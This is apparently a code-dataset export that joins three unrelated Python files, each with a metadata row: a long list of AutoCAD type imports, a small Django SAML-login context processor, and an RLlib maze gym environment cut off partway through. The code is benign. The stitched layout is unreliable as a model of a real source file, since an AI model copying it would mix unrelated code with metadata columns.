from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MidPointConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MInsertBlock
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MLeader
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MLeaderStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Mline
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MlineJustification
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MlineStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MlineStyleElement
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MlineStyleElementCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MlineStyleElementCollectionEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ModelDocViewLabelAlignmentType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ModelDocViewLabelAttachmentPoint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ModelerFlavor
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ModifiesOwnerAttribute
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MoveGripPointsFlags
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MoveType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MText
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MTextFragment
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MTextFragmentCallback
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MTextFragmentCallbackStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MultiModesGripPE
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import NewLayerNotification
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import NormalConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Notifier
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import NurbsData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import NurbSurface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectClosedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectClosedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectContext
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectContextCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectContextCollectionEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectContextManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectErasedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectErasedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectIdCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectIdGraph
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectIdGraphNode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectSnapContext
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectSnapInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectSnapModes
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectTypeAttribute
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Ole2Frame
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import OpenCloseTransaction
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import OpenMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import OpenModeAttribute
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import OrdinateDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import OrthographicView
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import OsnapOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PaperOrientationStates
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ParallelConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ParameterValueSet
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ParameterValueSetIncrement
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ParameterValueSetList
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ParameterValueSetMinMax
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ParseOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PasswordOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PathOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PathRef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PatternDefinition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PCAdsName
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PdfDefinition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PdfReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PerpendicularConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PhysicalIntensityMethod
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlaceHolder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Planarity
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlaneSurface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotPaperUnit
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotRotation
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotSettings
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotSettingsShadePlotType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotSettingsValidator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotStyleDescriptor
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotStyleNameType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotStyleTableChangedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotStyleTableChangedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Point3AngularDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloud
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudClassificationColorRamp
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudColorMap
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudColorRamp
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudColorSchemeChangedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudCrop
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudCropType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudDefEx
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudDispOptionOutOfRange
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudEx
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudItem
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudItemType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudProperty
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudPropertyState
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudStylizationType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCoincidenceConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCurveConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Poly2dType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Poly3dType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PolyFaceMesh
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PolyFaceMeshVertex
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PolygonMesh
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PolygonMeshVertex
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Polyline
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Polyline2d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Polyline3d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PolylineVertex3d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PolyMeshType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Profile3d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PropertiesOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ProxyEntity
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ProxyObject
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ProxyResurrectionCompletedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ProxyResurrectionCompletedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RadialDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RadialDimensionLarge
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RadiusDiameterConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RapidRTRenderSettings
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RapidRTRenderTarget
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RasterImage
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RasterImageDef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RasterVariables
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Ray
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Rectangle3d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RegAppTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RegAppTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Region
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RegionAreaProperties
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RenderEnvironment
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RenderGlobal
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RenderSettings
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ReservedStringEnumType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ResultBuffer
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ResultBufferEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RevolvedSurface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RevolveOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RevolveOptionsBuilder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RevolveOptionsCheckRevolveCurveOut
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RigidSetTypeInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RotatedDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RotationAngle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Row
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RowsCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RowType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SaveType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ScaleEstimationMethod
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Section
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionGeneration
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionGeometry
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionHeight
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionHitTestInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionSettings
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionState
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionSubItem
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionSymbol
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionViewArrowDirection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionViewIdentifierPosition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionViewStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SecurityActions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SecurityAlgorithm
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SecurityParameters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SegmentType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SelectType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SequenceEnd
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ShadePlotResLevel
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ShadePlotType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ShadowSamplingMultiplier
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Shape
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SkyBackground
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Solid
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Solid3d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Solid3dMassProperties
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SolidBackground
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SourceType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Spline
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SplineType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import StandardScaleType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import StdScaleType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SubDMesh
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SubentityGeometry
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SubentityId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SubentityOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SubentityType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SubentRef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Sun
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Surface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SurfaceSliceResults
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SurfaceTrimInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SweepOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SweepOptionsAlignOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SweepOptionsBuilder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SweepOptionsCheckSweepCurveOut
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SweptSurface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SymbolTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SymbolTableEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SymbolTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SymbolUtilityServices
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SymmetricConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SystemVariableChangedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SystemVariableChangedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SystemVariableChangingEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SystemVariableChangingEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Table
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableBreakFlowDirection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableBreakOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableCellType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableContent
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableCopyOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableEnumeratorOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableFillOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableHitTestInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableHitTestType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableStyleFlags
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableStyleOverride
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableTemplate
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TangentConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextAlignment
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextAlignmentType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextAngleType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextAttachmentDirection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextAttachmentType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditor
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorColumn
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorColumns
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorCursor
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorLocation
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorParagraph
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorParagraphTab
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorSelection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorSelectionbase
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorStack
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorWipeout
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextHorizontalMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextStyleTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextStyleTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextVerticalMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ThreePointAngleConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TimeZone
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Trace
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Transaction
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TransactionManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TransformOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TypedValue
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TypeOfCoordinates
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UcsTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UcsTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayDefinition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayFile
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayHost
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayItem
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayItemCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayLayer
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayLayerCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayLayerState
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Unit
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnitsConverter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnitsValue
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnitType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnitTypeAttribute
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UpdateAction
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UpdateDirection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UpdateOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Vertex
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Vertex2d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Vertex2dType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Vertex3dType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import VertexRef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import VerticalConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewBorder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Viewport
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewportTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewportTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewRepBlockReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewStyleType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Visibility
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import VisibilityOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import WblockNoticeEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import WblockNoticeEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Wipeout
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Xline
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Xrecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrecordEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefBeginOperationEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefBeginOperationEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefComandeeredEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefComandeeredEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefGraph
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefGraphNode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefNotificationStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefObjectId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefOperation
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefPreXrefLockFileEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefPreXrefLockFileEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefRedirectedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefRedirectedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefSubCommandAbortedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefSubCommandEndEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefSubCommandEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefSubCommandStartEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefVetoableSubCommandEventArgs
| 78.808989 | 110 | 0.911285 | 4,978 | 56,112 | 9.700683 | 0.144235 | 0.265024 | 0.368089 | 0.603665 | 0.749845 | 0.749845 | 0 | 0 | 0 | 0 | 0 | 0.000394 | 0.050684 | 56,112 | 711 | 111 | 78.919831 | 0.906154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.002813 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
56db9198096c3d9a2690b23e6e8b5ca0f940cfc0 | 119 | py | Python | rr/context_processors.py | UniversityofHelsinki/sp-registry | b1336b89788c076bf93f61b97b5469a99acd902c | [
"MIT"
] | null | null | null | rr/context_processors.py | UniversityofHelsinki/sp-registry | b1336b89788c076bf93f61b97b5469a99acd902c | [
"MIT"
] | 1 | 2020-08-10T13:16:58.000Z | 2020-08-18T06:30:20.000Z | rr/context_processors.py | UniversityofHelsinki/sp-registry | b1336b89788c076bf93f61b97b5469a99acd902c | [
"MIT"
] | null | null | null |
from django.conf import settings
def saml_login_url(request):
return {'SAML_LOGIN_URL': settings.SAML_LOGIN_URL}
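A hedged usage sketch (assumption: standard Django template wiring, which is not shown in this file): the processor becomes active once its dotted path is listed under the template engine's `context_processors`, after which `SAML_LOGIN_URL` is available in every template context.

```python
# settings.py fragment (illustrative only): register the context processor.
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.request",
                "rr.context_processors.saml_login_url",  # exposes SAML_LOGIN_URL
            ],
        },
    },
]
```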
| 19.833333 | 54 | 0.789916 | 18 | 119 | 4.888889 | 0.611111 | 0.306818 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12605 | 119 | 5 | 55 | 23.8 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
856246e009f12f448c1e1d25cacebd2f33445f52 | 7,821 | py | Python | rllib/examples/quarkzou/maze/maze_env.py | quarkzou/ray | 49de29969df0c55a5969b8ffbfc7d62459e5024b | [
"Apache-2.0"
] | null | null | null | rllib/examples/quarkzou/maze/maze_env.py | quarkzou/ray | 49de29969df0c55a5969b8ffbfc7d62459e5024b | [
"Apache-2.0"
] | null | null | null | rllib/examples/quarkzou/maze/maze_env.py | quarkzou/ray | 49de29969df0c55a5969b8ffbfc7d62459e5024b | [
"Apache-2.0"
] | null | null | null |
import gym
from gym.spaces import Discrete, Box
from ray.rllib.env.env_context import EnvContext
import numpy as np
import random
MAZE_SIZE = 4
MAZE_SHAPE = (4, 4)
TRAP1_POS = np.array([1, 1])
TRAP2_POS = np.array([2, 2])
EXIT_POS = np.array([2, 1])
TREASURE_POS = np.array([2, 3])
TREASURE_VALUE = 20.0
TRAP_VALUE = -10.0
EXIT_VALUE = 10.0
POS_VALUE = 1.0
class QuarkMaze(gym.Env):
def __init__(self, config: EnvContext):
# 0:up, 1:down, 2:left, 3:right
self.action_space = Discrete(4)
self.observation_space = Box(0, MAZE_SIZE - 1, shape=(2,), dtype=np.int8)
self.cur_pos = np.array([0, 0])
self.seed((config.worker_index + 1) * (config.num_workers + 1))
def reset(self):
self.cur_pos = np.array([0, 0])
return self.cur_pos
def step(self, action):
done = False
reward = 0.0
# 0:up, 1:down, 2:left, 3:right
# if action == 0 and self.cur_pos[1] > 0:
# self.cur_pos[1] = self.cur_pos[1] - 1
# elif action == 1 and self.cur_pos[1] < MAZE_SIZE - 1:
# self.cur_pos[1] = self.cur_pos[1] + 1
# elif action == 2 and self.cur_pos[0] > 0:
# self.cur_pos[0] = self.cur_pos[0] - 1
# elif action == 3 and self.cur_pos[0] < MAZE_SIZE - 1:
# self.cur_pos[0] = self.cur_pos[0] + 1
if action == 0:
if self.cur_pos[1] > 0:
self.cur_pos[1] = self.cur_pos[1] - 1
else:
reward = -1.0
elif action == 1:
if self.cur_pos[1] < MAZE_SIZE - 1:
self.cur_pos[1] = self.cur_pos[1] + 1
else:
reward = -1.0
elif action == 2:
if self.cur_pos[0] > 0:
self.cur_pos[0] = self.cur_pos[0] - 1
else:
reward = -1.0
elif action == 3:
if self.cur_pos[0] < MAZE_SIZE - 1:
self.cur_pos[0] = self.cur_pos[0] + 1
else:
reward = -1.0
if (self.cur_pos == TRAP1_POS).all() or (self.cur_pos == TRAP2_POS).all():
done = True
reward = TRAP_VALUE
elif (self.cur_pos == EXIT_POS).all():
done = True
reward = EXIT_VALUE
return self.cur_pos, reward, done, {}
def seed(self, seed=None):
random.seed(seed)
class QuarkMaze2(gym.Env):
def __init__(self, config: EnvContext):
# 0:up, 1:down, 2:left, 3:right
self.action_space = Discrete(4)
self.observation_space = Box(TRAP_VALUE, EXIT_VALUE, shape=MAZE_SHAPE, dtype=np.float32)
self.cur_pos = np.array([0, 0])
